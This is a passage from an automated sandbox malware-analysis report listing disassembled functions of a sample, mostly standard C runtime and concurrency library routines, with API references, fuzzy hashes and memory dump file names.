Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: b77c4df49245c04cf9f30b73afb2353642bc61b7e11542ff1ca011b009732496
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: 8651BC35A05A2A9FCF15CF68E5806EEBBF6EF15390F14449AE840A7351DB32A905CF90

Function 005F2DC0 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 005F2E5F
GetCurrentThreadId.KERNEL32 ref: 005F2E7E
__Mtx_unlock.LIBCPMT ref: 005F2ECC
__Cnd_broadcast.LIBCPMT ref: 005F2EE3

Part of subcall function 0060C5AF: mtx_do_lock.LIBCPMT ref: 0060C5B7

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
String ID:
API String ID: 3471820992-0
Opcode ID: 70cf791aa349496723557bd4da967b6cdccb47e590655b3a01847a1c4d1d5282
Instruction ID: 3bdeec876be411ce163525a4061a1708914f70252820505e52d9b263ceb5bd85
Opcode Fuzzy Hash: 70cf791aa349496723557bd4da967b6cdccb47e590655b3a01847a1c4d1d5282
Instruction Fuzzy Hash: 7241EEB0A406099FDB25DF64C941B6BBBF8FF04320F10462DEA15D7681EB38EA00CB81

Function 00635E6E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00635F3E
_free.LIBCMT ref: 00635F67
SetEndOfFile.KERNEL32(00000000,006318AA,00000000,0062AB32,?,?,?,?,?,?,?,006318AA,0062AB32,00000000), ref: 00635F99
GetLastError.KERNEL32(?,?,?,?,?,?,?,006318AA,0062AB32,00000000,?,?,?,?,00000000), ref: 00635FB5

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 9cafa7601eed0272f3db81d9a111751e349c301f60afe8a1aac14a79a429b3b9
Instruction ID: 8f60fa7279a3839e2ab10d803ff436c9572d2d5ebcd0bdd571639911d275b1e0
Opcode Fuzzy Hash: 9cafa7601eed0272f3db81d9a111751e349c301f60afe8a1aac14a79a429b3b9
Instruction Fuzzy Hash: 1441E272904E019BDB51ABB8AC46B9E3BB7EF44320F15051CF416E7291EA30C9508FE5

Function 00612C0C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00612C1F

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: c609e318188f02815db4960422254f0c6097a1db65fa644bee855a852e3d6530
Instruction ID: aeefb5f99c0f58008ffdb1ca8b33b0e97537cd344aa2e45e12bb00ceace171fb
Opcode Fuzzy Hash: c609e318188f02815db4960422254f0c6097a1db65fa644bee855a852e3d6530
Instruction Fuzzy Hash: 4B313D75A0030ADFCF50DF94C5D0AEE7BB6AF44300F1804AADD05AB346D771A995DB90

Function 0062D7EF Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 006268DC: _free.LIBCMT ref: 006268EA

Part of subcall function 0062E7C6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00634C60,?,00000000,00000000), ref: 0062E868

GetLastError.KERNEL32 ref: 0062D857
__dosmaperr.LIBCMT ref: 0062D85E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0062D89D
__dosmaperr.LIBCMT ref: 0062D8A4

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 6c1a2d00aa14a48d7a0622d2c92493fa9f2d1a32960d016a1e7c37d41a6608ff
Instruction ID: ff751506f44fd0a54ed7e583f35376f5f12b29d40693d659c5f527bcea770f7a
Opcode Fuzzy Hash: 6c1a2d00aa14a48d7a0622d2c92493fa9f2d1a32960d016a1e7c37d41a6608ff
Instruction Fuzzy Hash: A021A471604A35AFEB60AF66BC80DAB77AFEF003647108528F929D7280D735DC518FA0

Function 006209A8 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 006209F9
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 006209E1

Part of subcall function 00618E3F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00618E60

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00620A5C
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0064F490), ref: 00620A61

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 8f42aa9dc907ded0c92cd114b037d5c2497f5a100df11dc17f1c3b70d7ffdd2d
Instruction ID: f5924a3f027eb1a18fa8609d0a653469a1d68f5b9d8fbd9bc4f37458db3dd47f
Opcode Fuzzy Hash: 8f42aa9dc907ded0c92cd114b037d5c2497f5a100df11dc17f1c3b70d7ffdd2d
Instruction Fuzzy Hash: 6621F675700628AFD710E768DC45DAEB7BFEF48760B14405AFA16A33D2DF70AD018AA4

Function 0062A511 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0062685A,?,?,?,?,0062748E,?), ref: 0062A516
_free.LIBCMT ref: 0062A573
_free.LIBCMT ref: 0062A5A9
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0062685A,?,?,?,?,0062748E,?), ref: 0062A5B4

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7c71881b61d01ae8be69e162ce5272f5ae1149797de65b7dd8d264c885139f67
Instruction ID: 64356f60a1fa991de951427307e57570fe8af4c1c8cea0a5f84a923d6ee7faf0
Opcode Fuzzy Hash: 7c71881b61d01ae8be69e162ce5272f5ae1149797de65b7dd8d264c885139f67
Instruction Fuzzy Hash: AF110A32201F326F975166F4BC4697F221BDBC1375B281229F714A62D1DEA08C064D16

Function 0062123F Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 006212D3
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00621284

Part of subcall function 0061822B: SafeRWList.LIBCONCRT ref: 0061823C

SafeRWList.LIBCONCRT ref: 006212C9
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 006212E9

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 336577199-0
Opcode ID: f55eb9a9558ec4ac1639baec9fc12c24a90a6a0ccd72d27bfce2405305bf8e4b
Instruction ID: ced6a6010cc2e4656b1c780a63d215156dc2c899e51973fedce42d669c42d18f
Opcode Fuzzy Hash: f55eb9a9558ec4ac1639baec9fc12c24a90a6a0ccd72d27bfce2405305bf8e4b
Instruction Fuzzy Hash: C421D33121561ADFCB44DF20D881AA5FBEAFF91314F1492AAE4058F542DB31EAC6CBD0

Function 0062A668 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00627428,005F2147), ref: 0062A66D
_free.LIBCMT ref: 0062A6CA
_free.LIBCMT ref: 0062A700
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00627428,005F2147), ref: 0062A70B

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: fa06de2e7c5ebdbe5f186bf4c136c73dba9e6214c113ed684d998a0b61456e13
Instruction ID: cb65fe9ddcd621b6ae8c6f981ce49ab81a16b0f03449929b639b3085a90f4fa2
Opcode Fuzzy Hash: fa06de2e7c5ebdbe5f186bf4c136c73dba9e6214c113ed684d998a0b61456e13
Instruction Fuzzy Hash: E611E931200F326BD75167F5BC96D7F225BDBC27B6B2C1228F715861E1DBA18C064D1A

Function 0060F1FD Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0060F21F

Part of subcall function 0060F3DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00615396

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0060F240

Part of subcall function 006100C2: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 006100DE

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0060F25C
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0060F263

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: cad1e4dc4e27a12b36f7a1f2e32db47b44e0809fd4fe3155484298004bbdfe08
Instruction ID: 8e9597f9eee0e031e522972b5a5118619069521c596022de56c6393530ca207e
Opcode Fuzzy Hash: cad1e4dc4e27a12b36f7a1f2e32db47b44e0809fd4fe3155484298004bbdfe08
Instruction Fuzzy Hash: 6C01FE71540305ABD7347FA4CC81C9BBBAEEF10350710893DF555926C2D770D64187A5

Function 006232CE Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 006232E8
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 006232FC
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00623314
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0062332C

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 6535207b754217b7f110ede3807df6151201fe5aef853775b71ed9eb7bd95530
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 9101A732600A34A7CB15EA55D9419EFB7ABDF55350F00005AFC129B381DA25EF119AE4

Function 0062B5EC Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0062B751,00000000,?,00631E4B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0062B602
GetLastError.KERNEL32(?,00631E4B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0062B751,00000000,00000104,?), ref: 0062B60C
__dosmaperr.LIBCMT ref: 0062B613

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 968e21fc6b7b7c882ec9431e6a918c463fe8de78511ac9cf4609ace80e02324e
Instruction ID: 1871ac1a022b3086f90dbce978af3c61ec8bdade91d7a3abfede59f5a059c4b4
Opcode Fuzzy Hash: 968e21fc6b7b7c882ec9431e6a918c463fe8de78511ac9cf4609ace80e02324e
Instruction Fuzzy Hash: 96F01932604925BB9B206FA2EC08D9ABFABFF457A03006515F91DC7520DB31E8619FE0

Function 0062B655 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0062B751,00000000,?,00631DD6,00000000,00000000,0062B751,?,?,00000000,00000000,00000001), ref: 0062B66B
GetLastError.KERNEL32(?,00631DD6,00000000,00000000,0062B751,?,?,00000000,00000000,00000001,00000000,00000000,?,0062B751,00000000,00000104), ref: 0062B675
__dosmaperr.LIBCMT ref: 0062B67C

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 2198eb655a2e474616de39b0a7021ccf66d9c02aee7d1107305efa22ca996aa8
Instruction ID: 849124daced6a9a6a55930542f29af462bbb755cb5baea0b988fdcb8467a6304
Opcode Fuzzy Hash: 2198eb655a2e474616de39b0a7021ccf66d9c02aee7d1107305efa22ca996aa8
Instruction Fuzzy Hash: 7EF06D32204935BB9B202BA2EC08D86BF6BEF453A03005514B918D7521C731E861DFD0

Function 00614F15 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0060FE76: TlsGetValue.KERNEL32(?,?,0060F3F7,0060F224,?,?), ref: 0060FE7C

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00614F3F

Part of subcall function 0061E21E: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0061E245
Part of subcall function 0061E21E: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0061E25E
Part of subcall function 0061E21E: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0061E2D4
Part of subcall function 0061E21E: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0061E2DC

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00614F4D
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00614F57
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00614F61

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: c2846498c961eebf7903b02bfb37ad1111d2be0aa9c7ee4ec5549922408fd792
Instruction ID: 3dce30f61b803e0ebdcc05d8f2a11dd9c327a89f6522fd6d6b97836883be628a
Opcode Fuzzy Hash: c2846498c961eebf7903b02bfb37ad1111d2be0aa9c7ee4ec5549922408fd792
Instruction Fuzzy Hash: 6EF0F631A006246BCB65B764D8128EDB76B9FC0750B0C002DF80153392DF259F8587CA

Function 00619420 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00619429

Part of subcall function 0060F3DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00615396

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0061944D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00619460
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00619469

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: c96a36b59ff0826f59e31dca46232b4102caf812c214b890867f344a375d5f3f
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: 8FF0A070200E204EF6B5AA649821BAE23DA9F44715F08C51DE45A87682CB74E9838BA9

Function 0063696F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(005F86B0,0000000F,0064FAF0,00000000,005F86B0,?,0063505A,005F86B0,00000001,005F86B0,005F86B0,?,0062FF34,00000000,?,005F86B0), ref: 00636986
GetLastError.KERNEL32(?,0063505A,005F86B0,00000001,005F86B0,005F86B0,?,0062FF34,00000000,?,005F86B0,00000000,005F86B0,?,00630488,005F86B0), ref: 00636992

Part of subcall function 00636958: CloseHandle.KERNEL32(FFFFFFFE,006369A2,?,0063505A,005F86B0,00000001,005F86B0,005F86B0,?,0062FF34,00000000,?,005F86B0,00000000,005F86B0), ref: 00636968

___initconout.LIBCMT ref: 006369A2

Part of subcall function 0063691A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00636949,00635047,005F86B0,?,0062FF34,00000000,?,005F86B0,00000000), ref: 0063692D

WriteConsoleW.KERNEL32(005F86B0,0000000F,0064FAF0,00000000,?,0063505A,005F86B0,00000001,005F86B0,005F86B0,?,0062FF34,00000000,?,005F86B0,00000000), ref: 006369B7

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
